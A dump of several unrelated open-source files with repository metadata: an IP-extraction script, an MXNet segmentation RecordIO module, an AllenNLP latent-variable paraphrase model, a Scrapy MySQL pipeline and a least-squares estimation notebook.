# Get Luminoth's home directory (the default one or the overridden).
path = DEFAULT_LUMINOTH_HOME
if 'LUMI_HOME' in os.environ:
path = os.environ['LUMI_HOME']
path = os.path.abspath(path)
# Create the directory if it doesn't exist.
if create_if_missing and not os.path.exists(path):
tf.gfile.MakeDirs(path)
return path
|
[
"aazzinnari@gmail.com"
] |
aazzinnari@gmail.com
|
798e600ffd6cebdf2aa06b2b71741f788ad7e5d9
|
b198f2276f3f26bed9aaae347429875e573a0355
|
/Interview_Coding_Questions/extract_ip.py
|
5f8f784aaec2f3b0fcda2ea23d0eec658ea14071
|
[] |
no_license
|
PKStuff/task
|
c4dedd8d3cd3e34ac203839592e645d112a20ff2
|
36e0ad50aabc398135b98224eb7cca05867aa3eb
|
refs/heads/master
| 2021-06-13T22:22:56.332364
| 2021-02-09T11:57:46
| 2021-02-09T11:57:46
| 136,037,052
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 305
|
py
|
"""
This is my IP address 10.10.20.189 on network 2020.1.1 and also 192.168.0.1
"""
def extractIP(s1):
s1 = s1.split()
for string in s1:
if string.count('.') == 3:
print(string)
s1 = "This is my IP address 10.10.20.189 on network 2020.1.1 and also 192.168.0.1"
extractIP(s1)
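# A regex-based alternative (not in the original); it assumes only the standard
# library 're' module and matches dotted quads directly instead of counting dots.
import re
def extract_ip_re(text):
    return re.findall(r'\b(?:\d{1,3}\.){3}\d{1,3}\b', text)
print(extract_ip_re(s1))  # ['10.10.20.189', '192.168.0.1']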
|
[
"noreply@github.com"
] |
PKStuff.noreply@github.com
|
5baa937a803d1bfa2ca8c947fddf74cbd2b9d73b
|
3a218403531ef396e32daccf7f8e7812c9f7e8d2
|
/python/mxnet/seg_recordio.py
|
b2a2beb6c7930fea97fd62c2d0857e160dca47e4
|
[
"BSD-3-Clause",
"Zlib",
"Apache-2.0",
"BSD-2-Clause",
"BSD-2-Clause-Views"
] |
permissive
|
coderzbx/seg-mxnet
|
ac0f9cf450d0b4bebb26110921c83831ca832615
|
a3ef65a1991d59c23b6111048fdc16d38e2862af
|
refs/heads/master
| 2022-11-30T04:09:49.476375
| 2018-05-16T12:50:29
| 2018-05-16T12:50:29
| 127,411,826
| 0
| 1
|
Apache-2.0
| 2022-11-25T01:35:29
| 2018-03-30T09:51:04
|
C++
|
UTF-8
|
Python
| false
| false
| 15,191
|
py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Read and write for the RecordIO data format."""
from __future__ import absolute_import
from collections import namedtuple
import ctypes
import struct
import numbers
import numpy as np
from .base import _LIB
from .base import RecordIOHandle
from .base import check_call
from .base import c_str
try:
import cv2
except ImportError:
cv2 = None
class MXSegRecordIO(object):
"""Reads/writes `RecordIO` data format, supporting sequential read and write.
Example usage:
----------
>>> record = mx.seg_recordio.MXSegRecordIO('tmp.rec', 'w')
<mxnet.recordio.MXSegRecordIO object at 0x10ef40ed0>
>>> for i in range(5):
... record.write('record_%d'%i)
>>> record.close()
>>> record = mx.seg_recordio.MXSegRecordIO('tmp.rec', 'r')
>>> for i in range(5):
... item = record.read()
... print(item)
record_0
record_1
record_2
record_3
record_4
>>> record.close()
Parameters
----------
uri : string
Path to the record file.
flag : string
'w' for write or 'r' for read.
"""
def __init__(self, uri, flag):
self.uri = c_str(uri)
self.handle = RecordIOHandle()
self.flag = flag
self.is_open = False
self.open()
def open(self):
"""Opens the record file."""
if self.flag == "w":
check_call(_LIB.MXRecordIOWriterCreate(self.uri, ctypes.byref(self.handle)))
self.writable = True
elif self.flag == "r":
check_call(_LIB.MXRecordIOReaderCreate(self.uri, ctypes.byref(self.handle)))
self.writable = False
else:
raise ValueError("Invalid flag %s"%self.flag)
self.is_open = True
def __del__(self):
self.close()
def close(self):
"""Closes the record file."""
if not self.is_open:
return
if self.writable:
check_call(_LIB.MXRecordIOWriterFree(self.handle))
else:
check_call(_LIB.MXRecordIOReaderFree(self.handle))
self.is_open = False
def reset(self):
"""Resets the pointer to first item.
If the record is opened with 'w', this function will truncate the file to empty.
Example usage:
----------
>>> record = mx.seg_recordio.MXSegRecordIO('tmp.rec', 'r')
>>> for i in range(2):
... item = record.read()
... print(item)
record_0
record_1
>>> record.reset() # Pointer is reset.
>>> print(record.read()) # Started reading from start again.
record_0
>>> record.close()
"""
self.close()
self.open()
def write(self, buf):
"""Inserts a string buffer as a record.
Example usage:
----------
>>> record = mx.seg_recordio.MXSegRecordIO('tmp.rec', 'w')
>>> for i in range(5):
... record.write('record_%d'%i)
>>> record.close()
Parameters
----------
buf : string (python2), bytes (python3)
Buffer to write.
"""
assert self.writable
check_call(_LIB.MXRecordIOWriterWriteRecord(self.handle,
ctypes.c_char_p(buf),
ctypes.c_size_t(len(buf))))
def read(self):
"""Returns record as a string.
Example usage:
----------
>>> record = mx.seg_recordio.MXSegRecordIO('tmp.rec', 'r')
>>> for i in range(5):
... item = record.read()
... print(item)
record_0
record_1
record_2
record_3
record_4
>>> record.close()
Returns
----------
buf : string
Buffer read.
"""
assert not self.writable
buf = ctypes.c_char_p()
size = ctypes.c_size_t()
check_call(_LIB.MXRecordIOReaderReadRecord(self.handle,
ctypes.byref(buf),
ctypes.byref(size)))
if buf:
buf = ctypes.cast(buf, ctypes.POINTER(ctypes.c_char*size.value))
return buf.contents.raw
else:
return None
class MXIndexedSegRecordIO(MXSegRecordIO):
"""Reads/writes `RecordIO` data format, supporting random access.
Example usage:
----------
>>> for i in range(5):
... record.write_idx(i, 'record_%d'%i)
>>> record.close()
>>> record = mx.seg_recordio.MXIndexedSegRecordIO('tmp.idx', 'tmp.rec', 'r')
>>> record.read_idx(3)
record_3
Parameters
----------
idx_path : str
Path to the index file.
uri : str
Path to the record file. Only supports seekable file types.
flag : str
'w' for write or 'r' for read.
key_type : type
Data type for keys.
"""
def __init__(self, idx_path, uri, flag, key_type=int):
self.idx_path = idx_path
self.idx = {}
self.keys = []
self.key_type = key_type
self.fidx = None
super(MXIndexedSegRecordIO, self).__init__(uri, flag)
def open(self):
super(MXIndexedSegRecordIO, self).open()
self.idx = {}
self.keys = []
self.fidx = open(self.idx_path, self.flag)
if not self.writable:
for line in iter(self.fidx.readline, ''):
line = line.strip().split('\t')
key = self.key_type(line[0])
self.idx[key] = int(line[1])
self.keys.append(key)
def close(self):
"""Closes the record file."""
if not self.is_open:
return
super(MXIndexedSegRecordIO, self).close()
self.fidx.close()
def seek(self, idx):
"""Sets the current read pointer position.
This function is internally called by `read_idx(idx)` to find the current
reader pointer position. It doesn't return anything."""
assert not self.writable
pos = ctypes.c_size_t(self.idx[idx])
check_call(_LIB.MXRecordIOReaderSeek(self.handle, pos))
def tell(self):
"""Returns the current position of write head.
Example usage:
----------
>>> record = mx.seg_recordio.MXIndexedSegRecordIO('tmp.idx', 'tmp.rec', 'w')
>>> print(record.tell())
0
>>> for i in range(5):
... record.write_idx(i, 'record_%d'%i)
... print(record.tell())
16
32
48
64
80
"""
assert self.writable
pos = ctypes.c_size_t()
check_call(_LIB.MXRecordIOWriterTell(self.handle, ctypes.byref(pos)))
return pos.value
def read_idx(self, idx):
"""Returns the record at given index.
Example usage:
----------
>>> record = mx.seg_recordio.MXIndexedSegRecordIO('tmp.idx', 'tmp.rec', 'w')
>>> for i in range(5):
... record.write_idx(i, 'record_%d'%i)
>>> record.close()
>>> record = mx.seg_recordio.MXIndexedSegRecordIO('tmp.idx', 'tmp.rec', 'r')
>>> record.read_idx(3)
record_3
"""
self.seek(idx)
return self.read()
def write_idx(self, idx, buf):
"""Inserts input record at given index.
Example usage:
----------
>>> for i in range(5):
... record.write_idx(i, 'record_%d'%i)
>>> record.close()
Parameters
----------
idx : int
Index of a file.
buf :
Record to write.
"""
key = self.key_type(idx)
pos = self.tell()
self.write(buf)
self.fidx.write('%s\t%d\n'%(str(key), pos))
self.idx[key] = pos
self.keys.append(key)
ISegRHeader = namedtuple('HEADER', ['flag', 'label', 'image_size', 'label_size', 'id', 'id2'])
"""An alias for HEADER. Used to store metadata (e.g. labels) accompanying a record.
See mxnet.recordio.pack and mxnet.recordio.pack_img for example uses.
Parameters
----------
flag : int
Available for convenience, can be set arbitrarily.
label : float or an array of float
Typically used to store label(s) for a record.
image_size: int
length of image string.
label_size: int
length of label string.
id: int
Usually a unique id representing record.
id2: int
Higher order bits of the unique id, should be set to 0 (in most cases).
"""
_ISEGR_FORMAT = 'IfIIQQ'
_IR_SIZE = struct.calcsize(_ISEGR_FORMAT)
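# Note (added for clarity): 'IfIIQQ' lays out flag (uint32), label (float32),
# image_size (uint32), label_size (uint32), id (uint64) and id2 (uint64);
# with native alignment struct.calcsize typically reports 32 bytes, which is
# the value held by _IR_SIZE and skipped over in unpack().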
def pack(header, image_data, label_data):
"""Pack a string into MXImageRecord.
Parameters
----------
header : ISegRHeader
Header of the image record.
image_data : str
Raw image string to be packed.
label_data : str
Raw label string to be packed.
Returns
-------
s : str
The packed string.
Examples
--------
>>> id = 2574
>>> img = cv2.imread(fullpath, cv2.IMREAD_COLOR)
>>> ret, buf = cv2.imencode(".jpg", img)
>>> assert ret, 'failed to encode image'
>>> image_data = buf.tostring()
>>> image_len = len(image_data)
>>> label_path = item[-1]
>>> label = cv2.imread(label_path, cv2.IMREAD_GRAYSCALE)
>>> ret, buf = cv2.imencode(".png", label)
>>> assert ret, 'failed to encode label'
>>> label_data = buf.tostring()
>>> label_len = len(label_data)
>>> header = mx.seg_recordio.ISegRHeader(0, 0, image_len, label_len, id, 0)
>>> packed_s = mx.seg_recordio.pack(header, image_data, label_data)
"""
# test_s = image_data + label_data
# test_len = len(test_s)
# image_len = len(image_data)
# label_len = len(label_data)
header = ISegRHeader(*header)
s = struct.pack(_ISEGR_FORMAT, *header) + image_data + label_data
# total_len = len(s)
# if (image_len + label_len) != (header.image_size + header.label_size):
# print("{}<>{}+{}".format(total_len, header.image_size, header.label_size))
return s
def unpack(s):
"""Unpack a MXImageRecord to string.
Parameters
----------
s : str
String buffer from ``MXRecordIO.read``.
Returns
-------
header : IRHeader
Header of the image record.
s : str
Unpacked string.
Examples
--------
>>> record = mx.seg_recordio.MXSegRecordIO('test.rec', 'r')
>>> item = record.read()
>>> header, s = mx.seg_recordio.unpack(item)
>>> header
HEADER(flag=0, label=0, image_len=368032, label_len=38742, id=20129312, id2=0)
"""
header = ISegRHeader(*struct.unpack(_ISEGR_FORMAT, s[:_IR_SIZE]))
s = s[_IR_SIZE:]
if header.flag > 0:
s = s[header.flag*4:]
return header, s
def unpack_img(s, iscolor=-1):
"""Unpack a MXImageSegRecord to image.
Parameters
----------
s : str
String buffer from ``MXSegRecordIO.read``.
iscolor : int
Image format option for ``cv2.imdecode``.
Returns
-------
header : IRHeader
Header of the image record.
img : numpy.ndarray
Unpacked image.
Examples
--------
>>> record = mx.seg_recordio.MXSegRecordIO('test.rec', 'r')
>>> item = record.read()
>>> header, img, label = mx.seg_recordio.unpack_img(item)
>>> header
HEADER(flag=0, label=0, id=20129312, id2=0)
>>> img
array([[[ 23, 27, 45],
[ 28, 32, 50],
...,
[ 36, 40, 59],
[ 35, 39, 58]],
...,
[[ 91, 92, 113],
[ 97, 98, 119],
...,
[168, 169, 167],
[166, 167, 165]]], dtype=uint8)
"""
header, s = unpack(s)
image_data = np.frombuffer(s, dtype=np.uint8, count=header.image_size, offset=0)
label_data = np.frombuffer(s, dtype=np.uint8, count=header.label_size, offset=header.image_size)
assert cv2 is not None
image = cv2.imdecode(image_data, cv2.IMREAD_COLOR)
label = cv2.imdecode(label_data, cv2.IMREAD_GRAYSCALE)
return header, image, label
def pack_img(header, img, label, quality=95, img_fmt='.jpg', label_fmt='.png'):
"""Pack an image into ``MXImageRecord``.
Parameters
----------
header : IRHeader
Header of the image record.
img : numpy.ndarray
Image to be packed.
label: numpy.ndarry
Label to be packed
quality : int
Quality for JPEG encoding in range 1-100, or compression for PNG encoding in range 1-9.
img_fmt : str
Encoding of the image (.jpg for JPEG, .png for PNG).
label_fmt : str
Encoding of the label (.jpg for JPEG, .png for PNG).
Returns
-------
s : str
The packed string.
Examples
--------
>>> id = 2574
>>> image = cv2.imread('test.jpg', cv2.IMREAD_COLOR)
>>> ret, buf = cv2.imencode(".jpg", img)
>>> assert ret, 'failed to encode image'
>>> image_data = buf.tostring()
>>> image_len = len(image_data)
>>> label = cv2.imread('test.png', cv2.IMREAD_GRAYSCALE)
>>> ret, buf = cv2.imencode(".png", label)
>>> assert ret, 'failed to encode label'
>>> label_data = buf.tostring()
>>> label_len = len(label_data)
>>> header = mx.seg_recordio.ISegRHeader(0, 0, image_len, label_len, id, 0)
>>> packed_s = mx.seg_recordio.pack_img(header, image, label)
"""
assert cv2 is not None
encode_params = None
jpg_formats = ['.JPG', '.JPEG']
png_formats = ['.PNG']
if img_fmt.upper() in jpg_formats:
encode_params = [cv2.IMWRITE_JPEG_QUALITY, quality]
elif img_fmt.upper() in png_formats:
encode_params = [cv2.IMWRITE_PNG_COMPRESSION, quality]
ret, buf = cv2.imencode(img_fmt, img, encode_params)
assert ret, 'failed to encode image'
image_data = buf.tostring()
if label_fmt.upper() in jpg_formats:
encode_params = [cv2.IMWRITE_JPEG_QUALITY, quality]
elif label_fmt.upper() in png_formats:
encode_params = [cv2.IMWRITE_PNG_COMPRESSION, quality]
ret, buf = cv2.imencode(label_fmt, label, encode_params)
    assert ret, 'failed to encode label'
label_data = buf.tostring()
image_len = len(image_data)
label_len = len(label_data)
header = ISegRHeader(header.flag, header.label, image_len, label_len, header.id, 0)
return pack(header, image_data, label_data)
|
[
"zhangbenxing@kuandeng.com"
] |
zhangbenxing@kuandeng.com
|
3652ed9c9aa0576a74edaf5107cd392b4e4156b3
|
85c873074683ce54ab6056c42ca745f672867d72
|
/quora/lstm_lvm/model.py
|
415184aa3fd978ae5dcc8e9172689184ed6ff217
|
[] |
no_license
|
jihunchoi/cross-sentence-lvm-public
|
46dbbec5c5cba3db38d42437f7f30dd4e4659fab
|
c48f890dc994fb538b47bea864c5bc3d182b622e
|
refs/heads/master
| 2022-11-25T08:19:14.639728
| 2020-07-28T05:25:51
| 2020-07-28T05:25:51
| 283,109,097
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,256
|
py
|
from typing import Any, Dict, Optional, Union, List
import torch
from torch import nn
from torch.distributions import Categorical
from torch.nn import functional
from allennlp.common.params import Params
from allennlp.data.vocabulary import Vocabulary
from allennlp.models.model import Model
from allennlp.modules.feedforward import FeedForward
from allennlp.modules.token_embedders import Embedding
from allennlp.modules.seq2seq_encoders import PytorchSeq2SeqWrapper
from allennlp.modules.seq2vec_encoders import PytorchSeq2VecWrapper
from allennlp.nn.activations import Activation
from allennlp.nn.util import (
get_text_field_mask, sequence_cross_entropy_with_logits
)
from allennlp.training.metrics import CategoricalAccuracy
from modules.code_generators import GaussianCodeGenerator, VmfCodeGenerator
from utils.metrics import ScalarMetric
class SeparatedQuoraModel(Model):
_NUM_LABELS = 2
def __init__(self,
params: Params,
vocab: Vocabulary) -> None:
super().__init__(vocab=vocab)
enc_hidden_dim = params.pop_int('enc_hidden_dim', 300)
gen_hidden_dim = params.pop_int('gen_hidden_dim', 300)
disc_hidden_dim = params.pop_int('disc_hidden_dim', 1200)
disc_num_layers = params.pop_int('disc_num_layers', 1)
code_dist_type = params.pop_choice(
'code_dist_type', ['gaussian', 'vmf'],
default_to_first_choice=True)
code_dim = params.pop_int('code_dim', 300)
tie_embedding = params.pop_bool('tie_embedding', False)
emb_dropout = params.pop_float('emb_dropout', 0.0)
disc_dropout = params.pop_float('disc_dropout', 0.0)
l2_weight = params.pop_float('l2_weight', 0.0)
self.emb_dropout = nn.Dropout(emb_dropout)
self.disc_dropout = nn.Dropout(disc_dropout)
self._l2_weight = l2_weight
self._token_embedder = Embedding.from_params(
vocab=vocab, params=params.pop('token_embedder'))
self._encoder = PytorchSeq2VecWrapper(
nn.LSTM(input_size=self._token_embedder.get_output_dim(),
hidden_size=enc_hidden_dim, batch_first=True))
self._generator = PytorchSeq2SeqWrapper(
nn.LSTM(input_size=(self._token_embedder.get_output_dim()
+ code_dim),
hidden_size=gen_hidden_dim, batch_first=True))
self._generator_projector = nn.Linear(
in_features=self._generator.get_output_dim(),
out_features=vocab.get_vocab_size())
if tie_embedding:
self._generator_projector.weight = self._token_embedder.weight
if code_dist_type == 'vmf':
vmf_kappa = params.pop_int('vmf_kappa', 150)
self._code_generator = VmfCodeGenerator(
input_dim=self._encoder.get_output_dim(),
code_dim=code_dim, kappa=vmf_kappa)
elif code_dist_type == 'gaussian':
self._code_generator = GaussianCodeGenerator(
input_dim=self._encoder.get_output_dim(),
code_dim=code_dim)
else:
raise ValueError('Unknown code_dist_type')
self._discriminator = FeedForward(
input_dim=2 * self._code_generator.get_output_dim(),
hidden_dims=[disc_hidden_dim]*disc_num_layers + [self._NUM_LABELS],
num_layers=disc_num_layers + 1,
activations=[Activation.by_name('relu')()] * disc_num_layers
+ [Activation.by_name('linear')()],
dropout=disc_dropout)
self._kl_weight = 1.0
self._discriminator_weight = params.pop_float(
'discriminator_weight', 0.1)
self._gumbel_temperature = 1.0
# Metrics
self._metrics = {
'generator_loss': ScalarMetric(),
'kl_divergence': ScalarMetric(),
'discriminator_accuracy': CategoricalAccuracy(),
'discriminator_loss': ScalarMetric(),
'loss': ScalarMetric()
}
def get_regularization_penalty(self):
sum_sq = sum(p.pow(2).sum() for p in self.parameters())
l2_norm = sum_sq.sqrt()
return self.l2_weight * l2_norm
@property
def l2_weight(self):
return self._l2_weight
@property
def kl_weight(self):
return self._kl_weight
@kl_weight.setter
def kl_weight(self, value):
self._kl_weight = value
@property
def discriminator_weight(self):
return self._discriminator_weight
@discriminator_weight.setter
def discriminator_weight(self, value):
self._discriminator_weight = value
def embed(self, tokens: torch.Tensor) -> torch.Tensor:
return self._token_embedder(tokens)
def encode(self,
inputs: torch.Tensor,
mask: torch.Tensor,
drop_start_token: bool = True) -> torch.Tensor:
if drop_start_token:
inputs = inputs[:, 1:]
mask = mask[:, 1:]
enc_hidden = self._encoder(inputs.contiguous(), mask)
return enc_hidden
def sample_code_and_compute_kld(self,
hidden: torch.Tensor) -> torch.Tensor:
return self._code_generator(hidden)
def discriminate(self,
premise_hidden: torch.Tensor,
hypothesis_hidden: torch.Tensor) -> torch.Tensor:
disc_input = torch.cat(
[premise_hidden + hypothesis_hidden,
(premise_hidden - hypothesis_hidden).abs()],
dim=-1)
disc_input = self.disc_dropout(disc_input)
disc_logits = self._discriminator(disc_input)
return disc_logits
def construct_generator_inputs(self,
embeddings: torch.Tensor,
code: torch.Tensor) -> torch.Tensor:
batch_size, max_length, _ = embeddings.shape
code_expand = code.unsqueeze(1).expand(
batch_size, max_length, -1)
inputs = torch.cat([embeddings, code_expand], dim=-1)
return inputs
def generate(self,
code: torch.Tensor,
max_length: torch.Tensor) -> torch.Tensor:
start_index = self.vocab.get_token_index('<s>')
end_index = self.vocab.get_token_index('</s>')
pad_index = 0
done = torch.zeros_like(max_length).long()
max_max_length = max_length.max().item()
prev_word = (torch.empty_like(done).long().unsqueeze(1)
.fill_(start_index))
generated = []
self._generator.stateful = True
self._generator.reset_states()
for t in range(max_max_length):
if done.byte().all():
break
prev_word_emb = self.embed(prev_word)
input_t = self.construct_generator_inputs(
embeddings=prev_word_emb, code=code)
hidden_t = self._generator(input_t, 1 - done.unsqueeze(1))
pred_t = self._generator_projector(hidden_t).argmax(2)
pred_t.masked_fill_(done.byte(), pad_index)
generated.append(pred_t)
done.masked_fill_(pred_t.eq(end_index).squeeze(1), 1)
done.masked_fill_(max_length.le(t + 1), 1)
prev_word = pred_t
self._generator.stateful = False
generated = torch.cat(generated, dim=1)
return generated
def convert_to_readable_text(self,
generated: torch.Tensor) -> List[List[str]]:
sequences = [seq.cpu().tolist() for seq in generated.unbind(0)]
readable_sequences = []
for seq in sequences:
readable_seq = []
for word_index in seq:
if word_index != 0:
word = self.vocab.get_token_from_index(word_index)
readable_seq.append(word)
readable_sequences.append(readable_seq)
return readable_sequences
def compute_generator_loss(self,
embeddings: torch.Tensor,
code: torch.Tensor,
targets: torch.Tensor,
mask: torch.Tensor) -> torch.Tensor:
inputs = self.construct_generator_inputs(
embeddings=embeddings, code=code)
hiddens = self._generator(inputs.contiguous(), mask)
logits = self._generator_projector(hiddens)
weights = mask.float()
loss = sequence_cross_entropy_with_logits(
logits=logits, targets=targets.contiguous(), weights=weights,
average=None)
return loss
def forward(self,
premise: Dict[str, torch.Tensor],
hypothesis: Dict[str, torch.Tensor],
label: Optional[torch.Tensor] = None) -> Dict[str, Any]:
"""
premise and hypothesis are padded with
the BOS and the EOS token.
"""
pre_mask = get_text_field_mask(premise)
hyp_mask = get_text_field_mask(hypothesis)
pre_tokens = premise['tokens']
hyp_tokens = hypothesis['tokens']
pre_token_embs = self.embed(pre_tokens)
hyp_token_embs = self.embed(hyp_tokens)
pre_token_embs = self.emb_dropout(pre_token_embs)
hyp_token_embs = self.emb_dropout(hyp_token_embs)
output_dict = {}
pre_hidden = self.encode(
inputs=pre_token_embs, mask=pre_mask, drop_start_token=True)
hyp_hidden = self.encode(
inputs=hyp_token_embs, mask=hyp_mask, drop_start_token=True)
pre_code, pre_kld = self.sample_code_and_compute_kld(pre_hidden)
hyp_code, hyp_kld = self.sample_code_and_compute_kld(hyp_hidden)
pre_kld = pre_kld.mean()
hyp_kld = hyp_kld.mean()
pre_gen_mask = pre_mask[:, 1:]
hyp_gen_mask = hyp_mask[:, 1:]
pre_gen_loss = self.compute_generator_loss(
embeddings=pre_token_embs[:, :-1], code=pre_code,
targets=pre_tokens[:, 1:], mask=pre_gen_mask)
hyp_gen_loss = self.compute_generator_loss(
embeddings=hyp_token_embs[:, :-1], code=hyp_code,
targets=hyp_tokens[:, 1:], mask=hyp_gen_mask)
pre_gen_loss = pre_gen_loss.mean()
hyp_gen_loss = hyp_gen_loss.mean()
gen_loss = pre_gen_loss + hyp_gen_loss
kld = pre_kld + hyp_kld
loss = gen_loss + self.kl_weight*kld
if label is not None:
disc_logits = self.discriminate(premise_hidden=pre_code,
hypothesis_hidden=hyp_code)
disc_loss = functional.cross_entropy(
input=disc_logits, target=label)
loss = loss + self.discriminator_weight*disc_loss
output_dict['discriminator_loss'] = disc_loss
self._metrics['discriminator_loss'](disc_loss)
self._metrics['discriminator_accuracy'](
predictions=disc_logits, gold_labels=label)
output_dict['generator_loss'] = gen_loss
output_dict['kl_divergence'] = kld
output_dict['loss'] = loss
self._metrics['generator_loss'](gen_loss)
self._metrics['kl_divergence'](kld)
self._metrics['loss'](loss)
return output_dict
def get_metrics(self, reset: bool = False
) -> Dict[str, Union[float, Dict[str, float]]]:
metrics = {k: v.get_metric(reset=reset)
for k, v in self._metrics.items()}
metrics['kl_weight'] = self.kl_weight
metrics['discriminator_weight'] = self.discriminator_weight
return metrics
def test_labeled():
from pprint import pprint
params = Params({
'token_embedder': {
'num_embeddings': 4,
'embedding_dim': 3
},
'code_dist_type': 'vmf',
'vmf_kappa': 100
})
vocab = Vocabulary()
while True:
vocab_size = vocab.get_vocab_size()
if vocab_size == 4:
break
vocab.add_token_to_namespace('a' + str(vocab_size))
model = SeparatedQuoraModel(params=params, vocab=vocab)
premise = {'tokens': torch.randint(low=0, high=4, size=(5, 6))}
hypothesis = {'tokens': torch.randint(low=0, high=4, size=(5, 7))}
label = torch.randint(low=0, high=3, size=(5,))
output = model(premise=premise, hypothesis=hypothesis, label=label)
pprint(output)
pprint(model.get_metrics())
def test_unlabeled():
from pprint import pprint
params = Params({
'token_embedder': {
'num_embeddings': 4,
'embedding_dim': 3
},
'code_dist_type': 'gaussian'
})
vocab = Vocabulary()
while True:
vocab_size = vocab.get_vocab_size()
if vocab_size == 4:
break
vocab.add_token_to_namespace('a' + str(vocab_size))
model = SeparatedQuoraModel(params=params, vocab=vocab)
premise = {'tokens': torch.randint(low=0, high=4, size=(5, 6))}
hypothesis = {'tokens': torch.randint(low=0, high=4, size=(5, 7))}
output = model(premise=premise, hypothesis=hypothesis, label=None)
pprint(output)
pprint(model.get_metrics())
if __name__ == '__main__':
test_labeled()
test_unlabeled()
|
[
"jhchoi@europa.snu.ac.kr"
] |
jhchoi@europa.snu.ac.kr
|
6b35c592f8a2cbebcbf7547605a3603a6085d533
|
c042600d495d90a70fce0ce8dc24b88951994ed7
|
/LiteratureBooks/pipelines.py
|
14616d164683728b418f3055016487aba968b913
|
[] |
no_license
|
JC5137/distributeSpider
|
b8c938be3033f77f06c8ae57c96a81c9a2d2439a
|
9c068503f34b3bc14e055f70903b3c81b32e09d0
|
refs/heads/master
| 2021-04-12T11:50:17.689045
| 2017-07-12T13:44:37
| 2017-07-12T13:44:37
| 94,546,730
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,543
|
py
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
import MySQLdb
import MySQLdb.cursors
import logging
from twisted.enterprise import adbapi
class LiteraturebooksPipeline(object):
def __init__(self,dbpool):
self.dbpool = dbpool
@classmethod
def from_settings(cls, settings):
mysql_args = dict(
host=settings['MYSQL_HOST'],
db=settings['MYSQL_DBNAME'],
user=settings['MYSQL_USER'],
passwd=settings['MYSQL_PASSWD'],
charset='utf8',
cursorclass = MySQLdb.cursors.DictCursor,
use_unicode= True,
)
dbpool = adbapi.ConnectionPool('MySQLdb', **mysql_args)
return cls(dbpool)
    # Called by the pipeline by default for each item
def process_item(self, item, spider):
if "Amzon" in spider.name:
d = self.dbpool.runInteraction(self._do_insert, item, spider)
d.addErrback(self._handle_error, item, spider)
d.addBoth(lambda _: item)
return d
if "Jd" in spider.name:
d = self.dbpool.runInteraction(self._do_update, item, spider)
d.addErrback(self._handle_error, item, spider)
d.addBoth(lambda _: item)
return d
    # Insert into the database
def _do_insert(self, conn, item, spider):
parms = (item["book_id_amzon"],item["book_url_amzon"],item['book_name'],item['book_comments_num_amzon'],item['book_price_amzon'])
sql = """insert into book_info
(book_id_amzon,
book_url_amzon,
book_name,
book_comments_num_amzon,
book_price_amzon
)
values ('%s','%s','%s',%d,'%s')""" %parms
print sql
conn.execute(sql)
    # Update the database
def _do_update(self, conn, item, spider):
parms = (item["book_url_jd"],item["book_comments_num_jd"],item["book_price_jd"],item["book_name"],item["book_id_amzon"])
sql = """update book_info set
book_url_jd = '%s',
book_comments_sum_jd = '%d',
book_price_jd = '%s'
where book_name = '%s' and book_id_amzon = '%s'""" %parms
print sql
conn.execute(sql)
    # Error handling
    def _handle_error(self, failure, item, spider):
        logger = logging.getLogger("DB")
        logger.error(failure)
|
[
"834096423@qq.com"
] |
834096423@qq.com
|
fbb0c4e5b8fe265c6360855246cde8f9766f8dcf
|
7df98e150bb9bf9c4ef3299a00e70de80ef0fdad
|
/04-estimation/01-intro-to-estimation/website/22. Least Squares Notebook/Least-Squares-Solution.py
|
a8c9cc81fb40cb6d332f32dbed702c7e4ffeaa28
|
[] |
no_license
|
AkshadK/autonomous-flight-course-notes
|
fda761a31f2e208eab241bc4823fcf4dfa86a22b
|
6dc4cdf765c3018eb90c4e806d46841669d37c9e
|
refs/heads/master
| 2023-05-02T23:51:09.677180
| 2020-05-17T13:57:42
| 2020-05-17T13:57:42
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,841
|
py
|
#!/usr/bin/env python
# coding: utf-8
# # Least Squares
#
# In this notebook you'll use least squares to estimate a state vector $x$, given $m$ noisy measurements derived from:
#
# $
# \tilde{y} = Hx + v
# $
#
# $v$ is sampled from gaussian $N(0, R)$, and $H$ is a matrix mapping the state space to the measurement space. We'll assume x is constant, meaning the vehicle is currently not moving.
#
# Thus you'll want to select an estimate of the state $x$, $\hat{x}$ which maximizes the likelihood of the observed measurements $\tilde{y}$:
#
# $
# p(y = \tilde{y} | x = \hat{x})
# $
# In[2]:
import numpy as np
import matplotlib.pyplot as plt
import numpy.linalg as LA
get_ipython().run_line_magic('matplotlib', 'inline')
# ### Setup
# In[3]:
# number of samples
# the larger this value the more
# accurate the x hat will be.
n_samples = 100
# size of state
n = 4
# In[4]:
def make_H(m, degree, t):
"""
Creates a matrix where
each row is of the form:
[t**degree, t**(degree-1), ..., 1]
"""
H = np.zeros((m, degree))
for i in np.arange(degree-1, -1, -1):
H[:, -i-1] = t**i
return H
# In[5]:
# known constants
t = np.random.uniform(-5, 5, n_samples)
H = make_H(n_samples, n, t)
# state, unknown in practice
x = np.random.randn(n) * 2
# ### Collecting Observations
#
# First you'll have to collect $m$ noisy observations, these will be used later to estimate $x$.
#
# **NOTE: You may have not encountered the `@` syntax. In a nutshell, `np.dot(H, x)` is equivalent to `H @ x`. If the equation contains multiple matrix multiplications, using `@` provides a much more comprehensible expression. **
# In[6]:
# TODO: collect m noisy observations, the noise distribution should be gaussian
y_obs = H @ x + np.random.normal(0, 1, size=(n_samples))
# In[7]:
plt.plot(t, y_obs, 'bx')
plt.title("Noisy Observations")
# The observations plot produces a polynomial of order `len(x) - 1`, i.e. a 4-element state produces a 3rd order polynomial. In this case the state $x$ are the coefficients of the polynomial. By generating observation from evaluating the polynomial at several different points we can gain a good approximation of the original state.
#
